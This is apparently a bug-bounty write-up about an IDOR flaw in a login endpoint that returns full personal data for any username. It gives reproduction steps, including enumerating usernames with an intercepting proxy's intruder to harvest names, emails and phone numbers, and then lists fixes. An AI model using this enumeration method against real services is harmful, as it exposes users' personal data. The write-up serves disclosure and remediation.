Hello @All. Today we will talk about one of my latest findings at a private program. The vulnerable function is the login function that manages the attacker to replace the username and leak the PII for any registered user.
Let’s start the bug’s reproduction steps, and if you need to see a quick definition for the IDOR, just check this malicious user 1234
Steps to reproduce
1. At the vulnerable subdomain, you have a login function that requires to enter your username first and then if it’s valid, you will proceed to the next step to enter your password.
2. After entering a random user test
I surprised that there’s an existent user called test and I obtained all his PII data in the response. The endpoint seems likehttps://subdomain.target.com/v1.0.0/dev/userfirm/<username>
3. Send this request to the intruder and try with any leaked usernames to be more real.
By this way we can obtain most of the system users’ info like
- Username
- First/Last name
- Email address
- Phone number
- Telephone
- Firm Name
- User ID
After reporting the bug resolved and marked as P1
Mitigation/Fixing
1. Restrict the repose to not include any sensitive data, the developers needs these sensitive info to send them to another function, but they forget to restrict them far away the attacker's view. They can replace the PII data with a sentence like:
{"userExist":"true", "errors": null}
2. Add a throttling control at the specified API endpoint to stop any brute forcing attempts.